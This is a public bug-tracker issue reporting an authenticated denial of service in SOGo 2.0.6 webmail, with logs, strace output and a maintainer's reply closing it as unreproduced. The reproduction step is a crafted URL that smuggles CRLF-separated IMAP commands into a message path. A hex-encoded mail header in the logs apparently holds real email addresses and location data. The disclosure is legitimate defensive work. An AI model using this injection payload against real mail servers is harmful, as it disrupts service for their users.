0002370: Authenticated DOS is sogo, via imap injection (OWASP-DV-011) - SOGo | BTS

ID	Project	Category	View Status	Date Submitted	Last Update

0002370	SOGo	Backend Mail	public	2013-07-15 14:31	2013-09-27 14:11

Reporter	ispoljaric	Assigned To
Priority	normal	Severity	crash	Reproducibility	always
Status	closed	Resolution	suspended
Product Version	2.0.6

Summary	0002370: Authenticated DOS is sogo, via imap injection (OWASP-DV-011)
Description	Sogo dies after trying to fetch a mail via webmail, using modified url. The sogo cant restart, it runs in a busy loop, consuming maximum resources. We had to do killall -9 sogod; /etc/init.d/sogod restart, plain restart did nothing.
Steps To Reproduce	1) Log in 2) Paste and change info for your account/url following url: http://URL/SOGo/so/USERNAME/Mail//0/folderINBOX/14141%20%20BODY[HEADER]%0d%0aV100%20CAPABILITY%0d%0aV101%20FETCH%204791/view This one works everytime, I forgot to write down every combination that got a crash. There could be more problems with fetching mail.
Additional Information	After crash, we get: Proxy Error The proxy server received an invalid response from an upstream server. The proxy server could not handle the request GET /SOGo/so/ispoljaric/Mail//0/folderINBOX/14141 BODY[HEADER] V100 CAPABILITY V101 FETCH 4791/view. Reason: Error reading from remote server And strace gives us: wait4(-1, 0x7fff4c20775c, WNOHANG, NULL) = 0 poll([{fd=4, events=POLLIN}, {fd=7, events=POLLIN}, {fd=3, events=POLLIN}], 3, 84) = 1 ([{fd=3, revents=POLLIN}]) wait4(-1, 0x7fff4c20775c, WNOHANG, NULL) = 0 poll([{fd=4, events=POLLIN}, {fd=7, events=POLLIN}, {fd=3, events=POLLIN}], 3, 83) = 1 ([{fd=3, revents=POLLIN}]) wait4(-1, 0x7fff4c20775c, WNOHANG, NULL) = 0 poll([{fd=4, events=POLLIN}, {fd=7, events=POLLIN}, {fd=3, events=POLLIN}], 3, 79) = 1 ([{fd=3, revents=POLLIN}]) wait4(-1, 0x7fff4c20775c, WNOHANG, NULL) = 0 poll([{fd=4, events=POLLIN}, {fd=7, events=POLLIN}, {fd=3, events=POLLIN}], 3, 78) = 1 ([{fd=3, revents=POLLIN}]) wait4(-1, 0x7fff4c20775c, WNOHANG, NULL) = 0 poll([{fd=4, events=POLLIN}, {fd=7, events=POLLIN}, {fd=3, events=POLLIN}], 3, 75) = 1 ([{fd=3, revents=POLLIN}]) wait4(-1, 0x7fff4c20775c, WNOHANG, NULL) = 0 poll([{fd=4, events=POLLIN}, {fd=7, events=POLLIN}, {fd=3, events=POLLIN}], 3, 74) = 1 ([{fd=3, revents=POLLIN}]) wait4(-1, 0x7fff4c20775c, WNOHANG, NULL) = 0 And sogo.log writes these down, untill it is killed and restarted: <0xCF2162E8[SOGoMailObject]:14141 BODY[HEADER] V100 CAPABILITY V101 FETCH 4791> ERROR: unexpected IMAP4 result (missing 'message'): {"body[header]" = {data = <52657475 726e2d50 6174683a 203c4e69 6d69756d 2d52484e 2d436865 636b2d4e 6f2d5265 706c7940 6e69 6d69 756d2e68 723e0a52 65636569 7665643a 2066726f 6d206d61 696c2e6e 696d6975 6d2e636f 6d20285b 756e6978 20736f63 6b65745d 290a0920 6279206d 61696c2e 6e696d69 756d2e63 6f6d2028 43797275 73207 632 2e332e31 362d4665 646f7261 2d52504d 2d322e33 2e31362d 31302e73 66303038 33333934 362e6d6d 302e656c 365f3429 20776974 68204c4d 5450413b 0a092057 65642c20 3232204d 61792032 30313320 31343a 32 303a3536 202b3032 30300a58 2d536965 76653a20 434d5520 53696576 6520322e 330a5265 63656976 65643a20 66726f6d 206e696d 69756d2e 68722028 6370652d 39342d32 35332d32 34332d33 382e7374 2e63616 2 6c652e78 6e65742e 6872205b 39342e32 35332e32 34332e33 385d290a 09286175 7468656e 74696361 74656420 62697473 3d30290a 09627920 6d61696c 2e6e696d 69756d2e 636f6d20 28382e31 342e342f 382e3134 2e342f54 6865204f 72696769 6e616c20 44697374 72696275 74696f6e 29207769 74682045 534d5450 20696420 72344d43 4b755533 30323238 32320a09 28766572 73696f6e 3d544c53 76312f53 534c7633 20636970 6865723d 41455332 35362d53 48412062 6974733d 32353620 76657269 66793d4e 4f290a09 666f7220 3c697661 6e2e7370 6f6c6a61 72696340 6e696d69 756d2e68 723e3b20 5765642c 20323220 4d617920 32303133 2 031343a 32303a35 36202b30 3230300a 44617465 3a205765 642c2032 32204d61 79203230 31332031 343a3230 3a353620 2b303230 300a4d65 73736167 652d4964 3a203c32 30313330 35323231 3232302e 72344d43 4b 755533 30323238 3232406d 61696c2e 6e696d69 756d2e63 6f6d3e0a 436f6e74 656e742d 54797065 3a206d75 6c746970 6172742f 6d697865 643b2062 6f756e64 6172793d 223d3d3d 3d3d3d3d 3d3d3d3d 3d3d3d3d 393 03436 37383731 38353530 38333833 3332383d 3d220a4d 494d452d 56657273 696f6e3a 20312e30 0a537562 6a656374 3a205465 73746972 616e6a65 0a46726f 6d3a204e 696d6975 6d2d5248 4e2d4368 65636b2d 4e6f 2d52 65706c79 406e696d 69756d2e 68720a54 6f3a2069 76616e2e 73706f6c 6a617269 63406e69 6d69756d 2e68720a 582d5370 616d2d53 636f7265 3a20756e 64656620 2d20534d 54504155 54483a69 73706f6c 6a617 269 63406e69 6d69756d 2e687220 69732077 68697465 6c697374 65642e0a 582d4361 6e49742d 47656f3a 2069703d 39342e32 35332e32 34332e33 383b2063 6f756e74 72793d48 523b2072 6567696f 6e3d3231 3b2063 69 74793d5a 61677265 623b206c 61746974 7564653d 34352e38 3030303b 206c6f6e 67697475 64653d31 362e3030 30303b20 68747470 3a2f2f6d 6170732e 676f6f67 6c652e63 6f6d2f6d 6170733f 713d3435 2e38303 0 302c3136 2e303030 30267a3d 360a582d 43616e49 7450524f 2d537472 65616d3a 206e696d 69756d64 65666175 6c742028 696e6865 72697473 2066726f 6d206465 6661756c 74290a58 2d43616e 69742d53 74617473 2d49443a 2030334a 44306b55 3062202d 20366634 32366337 39393165 390a582d 5363616e 6e65642d 42793a20 43616e49 74202877 7777202e 20726f61 72696e67 70656e67 75696e20 2e20636f 6d290a0a>; }; msn = 5664; uid = 14141; } 10.0.0.225 - - [15/Jul/2013:13:58:27 GMT] "GET /SOGo/so/ispoljaric/Mail/0/folderINBOX/14141%20BODY%5BHEADER%5D%0D%0AV100%20CAPABILITY%0D%0AV101%20FETCH%204791 HTTP/1.1" 500 191/0 0.560 - - 0 Jul 15 13:58:34 sogod [1774]: [ERROR] <0x0x7f17cd9b2f58[WOWatchDogChild]> FAILURE receiving status for child 1813 Jul 15 13:58:34 sogod [1774]: [ERROR] <0x0x7f17cd9b2f58[WOWatchDogChild]> socket: <NGActiveSocket[0x0x7f17cdaab198]: mode=rw address=(null) connectedTo=<0x0x7f17cda37e68[NGLocalSocketAddre ss]: /tmp/_ngsocket_0x6ee_0x7f17cd7d5ff8_000> receive-timeout=1.000s> Jul 15 13:58:34 sogod [1774]: [ERROR] <0x0x7f17cd9b2f58[WOWatchDogChild]> exception: <NGSocketTimedOutException: 0x7f17cdac9d78> NAME:NGSocketTimedOutException REASON:the socket was shutdo wn INFO:{errno = 11; error = "Resource temporarily unavailable"; stream = "{object = <NGActiveSocket[0x0x7f17cdaab198]: mode=rw address=(null) connectedTo=<0x0x7f17cda37e68[NGLocalSocketAddr ess]: /tmp/_ngsocket_0x6ee_0x7f17cd7d5ff8_000> receive-timeout=1.000s>;}"; } Jul 15 13:58:34 sogod [1774]: <0x0x7f17cd9b2f58[WOWatchDogChild]> sending terminate signal to pid 1813 Jul 15 13:58:34 sogod [1774]: [ERROR] <0x0x7f17cd9b2f58[WOWatchDogChild]> FAILURE notifying child 1813 Jul 15 13:58:34 sogod [1774]: <0x0x7f17cd9b2f58[WOWatchDogChild]> sending terminate signal to pid 1813 Jul 15 14:12:06 sogod [1774]: <0x0x7f17cdb560f8[WOWatchDog]> Terminating with SIGINT or SIGTERM Jul 15 14:12:06 sogod [1774]: <0x0x7f17cdb560f8[WOWatchDog]> Terminating with SIGINT or SIGTERM Jul 15 14:12:07 sogod [1774]: <0x0x7f17cdb560f8[WOWatchDog]> Terminating with SIGINT or SIGTERM Jul 15 14:12:07 sogod [3598]: version 2.0.6b (build root@shiva.inverse 201306271214) -- starting
Tags	No tags attached.

ludovic 2013-07-16 15:34 administrator ~0005751	I can't reproduce that one. Moreover, the watchdog will kill any stuck processes and in real-world deployments, you must have more than one process to handle incoming requests. So please, provide detailed instructions on reproducing it and we'll see if we can mitigate it.

ludovic 2013-09-27 14:11 administrator ~0006055	No feedback provided in more than 2 months, closing.

Date Modified	Username	Field	Change
2013-07-15 14:31	ispoljaric	New Issue
2013-07-16 15:34	ludovic	Note Added: 0005751
2013-09-27 14:11	ludovic	Note Added: 0006055
2013-09-27 14:11	ludovic	Status	new => closed
2013-09-27 14:11	ludovic	Resolution	open => suspended